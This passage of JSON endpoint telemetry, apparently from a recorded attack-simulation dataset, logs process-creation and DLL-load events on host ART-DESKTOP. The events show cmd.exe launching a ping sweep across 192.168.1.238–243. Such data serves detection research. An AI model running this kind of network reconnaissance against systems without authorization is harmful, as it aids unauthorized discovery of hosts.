"pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - 
"image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2912, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573151980000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "event_type": "process", - "pid": 2912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573156990000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.238", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573157130000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - 
"image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573157140000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "event_type": "process", - "pid": 2788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573161830000, - "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.239", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1344, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573161970000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161830000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573161980000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "event_type": "process", - "pid": 1344, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573166990000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.240", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3552, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573167210000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167140000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167300000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573167300000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "event_type": "process", - "pid": 3552, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573171830000, - "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.241", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573171980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "event_type": "process", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573176830000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.242", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6756, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573176980000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "event_type": "process", - 
"pid": 6756, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573181830000, - "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.243", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4796, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - 
"unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
